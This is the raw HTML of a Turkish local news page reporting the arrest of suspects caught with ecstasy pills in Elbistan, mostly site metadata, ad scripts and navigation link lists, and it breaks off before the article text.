
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan İlçe Emniyet Müdürlüğü ekiplerince bir otomobilde ele geçirilen 298 adet ectasy hapla ilgili olarak yakalanan 3 şüpheliden 2&#039;si çıkarıldıkları"> <meta name="keywords" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <meta name="news_keywords" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <meta property="og:description" content="Elbistan İlçe Emniyet Müdürlüğü ekiplerince bir otomobilde ele geçirilen 298 adet ectasy hapla ilgili olarak yakalanan 3 şüpheliden 2&#039;si çıkarıldıkları"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <meta name="twitter:description" content="Elbistan İlçe Emniyet Müdürlüğü ekiplerince bir otomobilde ele geçirilen 298 adet ectasy hapla ilgili olarak yakalanan 3 şüpheliden 2’si çıkarıldıkları mahkemece tutuklandı."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg" /> <meta itemprop="headline" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2021-01-11T15:02:24+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.4784</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">9.0862</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">443.397</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1536</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html" title="AK Parti ve MHP’den ortak açıklama" >AK Parti ve MHP’den ortak açıklama</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ikizpinardan-yol-genisletme-tesekkuru-h68947.html" title="İkizpınar’dan yol genişletme teşekkürü" >İkizpınar’dan yol genişletme teşekkürü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanspora-destek-icin-acilmisti-kapatma-karari-alindi-h68946.html" title="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı" >Elbistanspor’a destek için açılmıştı, kapatma kararı alındı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html" title="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" >298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ak-partiden-calisan-gazeteciler-gunu-ziyareti-h68940.html" title="AK Parti’den Çalışan Gazeteciler Günü ziyareti" >AK Parti’den Çalışan Gazeteciler Günü ziyareti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kosebalan-ve-yikansiz-gecen-gazeteciler-gunu-h68939.html" title="Kösebalan ve Yıkansız geçen gazeteciler günü" >Kösebalan ve Yıkansız geçen gazeteciler günü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-h68935.html" title="Toplu ulaşıma zam" >Toplu ulaşıma zam</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-deveboynundan-10-ocak-calisan-gazeteciler-gunu-mesaji-h68933.html" title="Başkan Deveboynu’ndan 10 Ocak Çalışan Gazeteciler Günü mesajı" >Başkan Deveboynu’ndan 10 Ocak Çalışan Gazeteciler Günü mesajı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-general-degisen-kredi-faiz-ve-sartlarini-acikladi-h68930.html" title="Başkan General, değişen kredi faiz ve şartlarını açıkladı" >Başkan General, değişen kredi faiz ve şartlarını açıkladı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-10-ocak-calisan-gazeteciler-gunu-mesaji-h68928.html" title="Kaymakam Demir’den 10 Ocak Çalışan Gazeteciler Günü mesajı" >Kaymakam Demir’den 10 Ocak Çalışan Gazeteciler Günü mesajı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="e32f8205dc4fccb76b65067c54712862b050c73b" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/whatsapp-vefat-hatti-h66390.html" title="WHATSAPP VEFAT HATTI"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/0/0/whatsapp_vefat_hatti_h66390_25b5e.jpg" alt="WHATSAPP VEFAT HATTI" /> WHATSAPP VEFAT HATTI</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-sevim-gokcek-h68945.html" title="Anma / Sevim Gökçek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/anma_sevim_gokcek_h68945_7fc22.jpg" alt="Anma / Sevim Gökçek" /> Anma / Sevim Gökçek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-celal-kecebir-h68944.html" title="Anma / Celal Keçebir"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/anma_celal_kecebir_h68944_00f7d.jpg" alt="Anma / Celal Keçebir" /> Anma / Celal Keçebir</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html" title="H. Ahmet Has"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/h_ahmet_has_h68943_bb4ca.jpg" alt="H. Ahmet Has" /> H. Ahmet Has</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html" title="AK Parti ve MHP’den ortak açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ak_parti_ve_mhpden_ortak_aciklama_h68948_14671.jpg" alt="AK Parti ve MHP’den ortak açıklama" /> AK Parti ve MHP’den ortak açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ikizpinardan-yol-genisletme-tesekkuru-h68947.html" title="İkizpınar’dan yol genişletme teşekkürü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ikizpinardan_yol_genisletme_tesekkuru_h68947_97357.jpg" alt="İkizpınar’dan yol genişletme teşekkürü" /> İkizpınar’dan yol genişletme teşekkürü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanspora-destek-icin-acilmisti-kapatma-karari-alindi-h68946.html" title="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/elbistanspora_destek_icin_acilmisti_kapatma_karari_alindi_h68946_6543a.jpg" alt="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı" /> Elbistanspor’a destek için açılmıştı, kapatma kararı alındı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ozer-ve-sahinden-mehmet-gocere-gazeteciler-gunu-ziyareti-h68942.html" title="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/01/ozer_ve_sahinden_mehmet_gocere_gazeteciler_gunu_ziyareti_h68942_3b75d.jpg" alt="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti" /> Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, 